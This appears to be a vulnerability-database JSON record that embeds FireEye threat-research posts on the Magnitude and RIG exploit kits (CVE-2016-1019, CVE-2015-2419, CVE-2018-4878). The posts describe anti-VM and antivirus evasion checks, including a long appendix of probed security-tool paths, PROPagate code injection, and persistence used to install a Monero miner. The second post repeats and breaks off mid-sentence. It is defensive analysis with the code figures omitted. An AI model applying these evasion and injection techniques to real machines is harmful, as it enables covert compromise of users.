"THREATPOST:FA8E33E96268AABB7760B30AFBCF0924"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-1019"]}, {"type": "zdt", "idList": ["1337DAY-ID-30433"]}]}, "score": {"value": 8.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201604-7"]}, {"type": "attackerkb", "idList": ["AKB:1B9FE055-9F52-4311-A5FC-E996A72071B1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1058"]}, {"type": "cve", "idList": ["CVE-2015-2419", "CVE-2016-1019"]}, {"type": "fireeye", "idList": ["FIREEYE:63FF7C5A6B820A2EFDA493058DB917D6", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076"]}, {"type": "freebsd", "idList": ["07888B49-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "mmpc", "idList": ["MMPC:A8911A071FAE866BC15F59CA0B325D45"]}, {"type": "nessus", "idList": ["FLASH_PLAYER_APSB16-10.NASL", "OPENSUSE-2016-433.NASL", "OPENSUSE-2016-440.NASL", "REDHAT-RHSA-2016-0610.NASL", "SMB_NT_MS16-050.NASL", "SUSE_SU-2016-0990-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810668"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14594"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0987-1", "OPENSUSE-SU-2016:0997-1", "SUSE-SU-2016:0990-1"]}, {"type": "symantec", "idList": ["SMNTC-75661"]}, {"type": "threatpost", "idList": ["THREATPOST:119E7D78B854D1FD10222FB18949985B", "THREATPOST:FA8E33E96268AABB7760B30AFBCF0924"]}]}, "exploitation": null, "vulnersScore": 8.1}, "immutableFields": [], "cvss2": {"acInsufInfo": true, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}
{"fireeye": [{"lastseen": "2021-11-04T00:25:48", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T12:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-1019"], "modified": "2016-04-07T12:30:00", "id": "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T16:34:44", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.\n\n \nFigure 7: Call to JSON.Stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indictative of virtual machines\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).\n\n \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-28T16:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-0189", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-06-28T16:00:00", "id": "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits 